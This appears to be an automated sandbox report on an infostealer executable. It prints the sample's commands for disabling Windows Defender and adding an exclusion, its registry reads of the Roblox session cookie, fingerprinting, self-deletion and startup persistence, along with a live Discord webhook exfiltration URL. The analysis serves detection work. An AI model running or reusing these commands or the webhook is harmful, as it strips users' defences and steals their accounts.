                        Source: powershell.exe, 00000014.00000002.1406940608.00000171320AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDA18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B356E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 00000014.00000002.1406940608.00000171320AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDA18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B356E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ptb.discord.com
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098129000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49707 version: TLS 1.2

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: IDLBk4XMUa.exe, type: SAMPLEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACD347B00_2_00007FFAACD347B0
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACD347380_2_00007FFAACD34738
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACCEDFD00_2_00007FFAACCEDFD0
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACCF89A00_2_00007FFAACCF89A0
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACCF32180_2_00007FFAACCF3218
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACCE72280_2_00007FFAACCE7228
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACCF8A1D0_2_00007FFAACCF8A1D
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACCF93900_2_00007FFAACCF9390
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACCF8C280_2_00007FFAACCF8C28
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACD01EA80_2_00007FFAACD01EA8
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACCF1C100_2_00007FFAACCF1C10
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEA85860_2_00007FFAACEA8586
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEB65680_2_00007FFAACEB6568
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEB89120_2_00007FFAACEB8912
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEAE28E0_2_00007FFAACEAE28E
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEB52450_2_00007FFAACEB5245
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEB02300_2_00007FFAACEB0230
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEA61FB0_2_00007FFAACEA61FB
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEBA1FB0_2_00007FFAACEBA1FB
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEAF3D20_2_00007FFAACEAF3D2
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEABD220_2_00007FFAACEABD22
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEADD120_2_00007FFAACEADD12
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEBC6210_2_00007FFAACEBC621
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEA05F50_2_00007FFAACEA05F5
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEB16F10_2_00007FFAACEB16F1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEA30700_2_00007FFAACEA3070
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAACD7331614_2_00007FFAACD73316
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFAACDA2F3618_2_00007FFAACDA2F36
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFAACDA329218_2_00007FFAACDA3292
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFAACDA340620_2_00007FFAACDA3406
                        Source: IDLBk4XMUa.exe, 00000000.00000000.1255650381.00000200961AC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs IDLBk4XMUa.exe
                        Source: IDLBk4XMUa.exeBinary or memory string: OriginalFilename vs IDLBk4XMUa.exe
                        Source: IDLBk4XMUa.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: IDLBk4XMUa.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: IDLBk4XMUa.exe, ------.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: IDLBk4XMUa.exe, ------.csBase64 encoded string: 'JiZudleSP7ManqLwYD6fZEaRcprwRVawbHjadwJGoLDOw0lVHISBlyhSuJxWxvZJegzQWBN2LCdjOCCxmJpB7XVMgk6KgiP+1XhLA5dVuLvp8x33HNNC00vzNwqIMYahc50Tg5SJ4v/L8a1/OklBQgBUSkTOo+Gsl/eOhu6ucTGFqolLSrPnzgeET0s0'
                        Source: NcIxl.scr.0.dr, ------.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: NcIxl.scr.0.dr, ------.csBase64 encoded string: 'JiZudleSP7ManqLwYD6fZEaRcprwRVawbHjadwJGoLDOw0lVHISBlyhSuJxWxvZJegzQWBN2LCdjOCCxmJpB7XVMgk6KgiP+1XhLA5dVuLvp8x33HNNC00vzNwqIMYahc50Tg5SJ4v/L8a1/OklBQgBUSkTOo+Gsl/eOhu6ucTGFqolLSrPnzgeET0s0'
                        Source: NcIxl.scr.0.dr, ------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: NcIxl.scr.0.dr, ------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: IDLBk4XMUa.exe, ------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: IDLBk4XMUa.exe, ------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@39/24@3/2
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\IDLBk4XMUa.exe.logJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:816:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1476:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeMutant created: \Sessions\1\BaseNamedObjects\ee04PtQO8zB6PJxMASmK
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile created: C:\Users\user\AppData\Local\Temp\nlQT11xVcC5SHaKJump to behavior
                        Source: IDLBk4XMUa.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: IDLBk4XMUa.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.000002009864D000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1906042721.00000200B0975000.00000004.00000020.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200985DB000.00000004.00000800.00020000.00000000.sdmp, tlf64c2jHarKcpu.0.dr, oFhYVgGK4pGWvb1.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: IDLBk4XMUa.exeVirustotal: Detection: 86%
                        Source: IDLBk4XMUa.exeReversingLabs: Detection: 81%
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile read: C:\Users\user\Desktop\IDLBk4XMUa.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\IDLBk4XMUa.exe "C:\Users\user\Desktop\IDLBk4XMUa.exe"
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\IDLBk4XMUa.exe"
                        Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\IDLBk4XMUa.exe" && pause
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\IDLBk4XMUa.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\IDLBk4XMUa.exe" && pauseJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: devenum.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: msdmo.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
